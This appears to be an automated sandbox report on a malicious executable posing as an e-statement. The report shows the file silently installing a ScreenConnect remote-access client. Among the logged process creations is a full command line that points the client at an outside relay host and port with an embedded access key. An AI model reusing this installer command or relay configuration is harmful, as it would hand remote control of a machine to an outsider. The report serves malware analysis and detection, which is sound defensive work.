                                  Source: qmgr.db.10.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1337617733.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.2589424535.0000000002099000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1444417476.0000000002F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: rundll32.exe, 00000005.00000003.1350076124.0000000004909000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1350297862.0000000004803000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1350076124.0000000004978000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                                  Source: rundll32.exe, 00000005.00000003.1350076124.0000000004909000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1350297862.0000000004803000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1350076124.0000000004978000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/news/
                                  Source: rundll32.exe, 00000005.00000003.1350076124.0000000004909000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1350297862.0000000004803000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1350076124.0000000004978000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/releases/
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: ScreenConnect.WindowsCredentialProvider.dll.3.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                                  Source: ScreenConnect.Core.dll.3.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                                  Source: svchost.exe, 0000000A.00000002.2585076024.000001DEBBA13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs.microsoft
                                  Source: edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                                  Source: svchost.exe, 0000000A.00000003.1413623593.000001DEC0F50000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                                  System Summary

                                  barindex
                                  Source: estatement020134230003.exe.virus.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 8_2_05A70040 CreateProcessAsUserW,8_2_05A70040
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\60e8b7.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{F4AC94C9-4954-76D1-AA9E-1F00F1476998}Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEACA.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEAEA.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEDBA.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\60e8b9.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\60e8b9.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{F4AC94C9-4954-76D1-AA9E-1F00F1476998}Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{F4AC94C9-4954-76D1-AA9E-1F00F1476998}\DefaultIconJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{F4AC94C9-4954-76D1-AA9E-1F00F1476998}.SchedServiceConfig.rmiJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (8d1a70ac1b2b845c)Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (8d1a70ac1b2b845c)\elxini4z.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (8d1a70ac1b2b845c)\elxini4z.newcfgJump to behavior
                                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIEAEA.tmpJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeCode function: 0_2_0131E2CD0_2_0131E2CD
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeCode function: 0_2_013167A80_2_013167A8
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeCode function: 0_2_01315E1F0_2_01315E1F
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeCode function: 0_2_056187D80_2_056187D8
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeCode function: 0_2_0561BA500_2_0561BA50
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeCode function: 0_2_056187C80_2_056187C8
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeCode function: 0_2_05617DB00_2_05617DB0
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeCode function: 0_2_05630CB80_2_05630CB8
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeCode function: 0_2_05631E9B0_2_05631E9B
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 8_2_01C8ADD78_2_01C8ADD7
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 8_2_01C8E3078_2_01C8E307
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 8_2_01C8D5888_2_01C8D588
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CCB10D79_2_00007FFE7CCB10D7
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CCB10CF9_2_00007FFE7CCB10CF
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CFC770F9_2_00007FFE7CFC770F
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFE7CC910D711_2_00007FFE7CC910D7
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFE7CC910CF11_2_00007FFE7CC910CF
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFE7CFA6E9511_2_00007FFE7CFA6E95
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1337185418.0000000002C50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000000.1326278393.000000000120F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000000.1326278393.000000000120F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1337411838.0000000002E40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1363853523.000000000584C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1363853523.000000000584C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1363853523.000000000584C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1363853523.000000000584C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1350839168.0000000004043000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000000.1326278393.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000000.1326278393.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000000.1326278393.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000000.1326278393.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000000.1326278393.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1361157674.00000000053A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1361697928.0000000005430000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1361697928.0000000005430000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1361697928.0000000005430000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenamezlib.dll2 vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenamewixca.dll\ vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: 0.2.estatement020134230003.exe.virus.exe.53a0000.5.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.2.estatement020134230003.exe.virus.exe.5430000.9.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.0.estatement020134230003.exe.virus.exe.d6c3d4.1.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.0.estatement020134230003.exe.virus.exe.d6c3d4.1.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.0.estatement020134230003.exe.virus.exe.d6c3d4.1.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.0.estatement020134230003.exe.virus.exe.d6c3d4.1.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                                  Source: 0.2.estatement020134230003.exe.virus.exe.5430000.9.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.2.estatement020134230003.exe.virus.exe.5430000.9.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.2.estatement020134230003.exe.virus.exe.5430000.9.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                                  Source: classification engineClassification label: mal48.evad.winEXE@18/57@2/2
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)Jump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\estatement020134230003.exe.virus.exe.logJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeMutant created: NULL
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: estatement020134230003.exe.virus.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6349687 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                  Source: estatement020134230003.exe.virus.exeReversingLabs: Detection: 18%
                                  Source: estatement020134230003.exe.virus.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                                  Source: estatement020134230003.exe.virus.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeFile read: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\estatement020134230003.exe.virus.exe "C:\Users\user\Desktop\estatement020134230003.exe.virus.exe"
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\8d1a70ac1b2b845c\ScreenConnect.ClientSetup.msi"
                                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4B0EB90007EAA1AAA53FFC7F9A3C06A0 C
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6349687 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 55E13C22DDD204F783E51197303A9E7C
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 42A8F4A2C940B9BB8BF7F1D0A8DC547D E Global\MSI0000
                                  Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=learnskillboosts.con-ip.com&p=8041&s=83bddc03-80e5-4274-9bbf-03906dc66e78&k=BgIAAACkAABSU0ExAAgAAAEAAQDh9vKuLEL1L4HK6ORtVBsB%2bthOksnlK7Ue9qyl%2f0hx9D6Dat7da%2fwWDSnfFAil7wZKoZkfGeFuVZh3db2B%2fNSvW1GbYYRU0i1tb65QvaGA%2fLvqINqA%2fMRlkTLEsdJ%2fbBxBWucr3qLZST6J6zV5%2bJ3YeRZg2t2x3hg00znLoKDHzKrITuiILcoCFsdX8uO3NTl2K0LkUPBJEwrHeKYioqGccrKSxO68%2fPJLrw6iaEa%2fbdf3oiyw%2fF5lubvyzuV43Lm%2b7jGQuatswnq0I7edWlBMXC6AaGp4XFBg3ZW%2fLZs6BDLgcD1KTXwQtIgJkldweisogA4AWx5bvaiCcsnM3YGx&c=GENRAL-LM&c=&c=&c=&c=&c=&c=&c="
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe" "RunRole" "4e7e4252-7a52-43b7-b468-adf4aa363155" "User"
                                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe" "RunRole" "106fd89e-6d51-4cff-8c4a-637d8376f30e" "System"
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\8d1a70ac1b2b845c\ScreenConnect.ClientSetup.msi"Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4B0EB90007EAA1AAA53FFC7F9A3C06A0 CJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 55E13C22DDD204F783E51197303A9E7CJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 42A8F4A2C940B9BB8BF7F1D0A8DC547D E Global\MSI0000Jump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6349687 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe" "RunRole" "4e7e4252-7a52-43b7-b468-adf4aa363155" "User"Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe" "RunRole" "106fd89e-6d51-4cff-8c4a-637d8376f30e" "System"Jump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: kernel.appcore.dllJump to behavior
